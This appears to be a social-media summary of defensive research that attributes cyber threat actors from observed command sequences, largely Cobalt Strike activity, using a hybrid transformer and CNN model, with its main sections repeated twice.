Unveiling Cyber Threat Actors

We present a method for identifying cyber threat actors from their behavior, specifically the command sequences they run during an attack. We built a dataset of commands from many actors, with a heavy focus on the #cobalt-strike framework.

Key Contributions

•
Hybrid Architecture: We combine #transformers (for global context) and Convolutional Neural Networks (#CNN, for local features) to profile threat actors.
•
Behavioral Attribution: We move beyond simple #IoC matching to "soft attribution" based on behavioral signatures (#TTP).
•
Performance: Our model reached an F1-score of 95.11% and accuracy of 95.13% on a high-count dataset, beating pre-trained models like BERT, RoBERTa, SecureBERT, and DarkBERT.

Methodology

•
Dataset: We collected command sequences from real-world incidents and #CTI reports.
•
Preprocessing: We used Natural Language Processing (#NLP) to tokenize and process the command lines.
•
Model: A hybrid deep learning model integrating:
- •
  Transformers: To capture long-range dependencies and global context in the sequence of commands.
- •
  CNNs: To extract local features and patterns within specific commands or short sequences.

Significance

This pushes automated threat attribution forward. It can cut the workload for incident responders by suggesting a likely threat actor from observed behavior, not just from static indicators.

Key Contributions

•
Hybrid Architecture: We combine #transformers (for global context) and Convolutional Neural Networks (#CNN, for local features) to profile threat actors.
•
Behavioral Attribution: We move beyond simple #IoC matching to "soft attribution" based on behavioral signatures (#TTP).
•
Performance: Our model reached an F1-score of 95.11% and accuracy of 95.13% on a high-count dataset, beating pre-trained models like BERT, RoBERTa, SecureBERT, and DarkBERT.

Methodology

•
Dataset: We collected command sequences from real-world incidents and #CTI reports.
•
Preprocessing: We used Natural Language Processing (#NLP) to tokenize and process the command lines.
•
Model: A hybrid deep learning model integrating:
- •
  Transformers: To capture long-range dependencies and global context in the sequence of commands.
- •
  CNNs: To extract local features and patterns within specific commands or short sequences.

Significance

This pushes automated threat attribution forward. It can cut the workload for incident responders by suggesting a likely threat actor from observed behavior, not just from static indicators.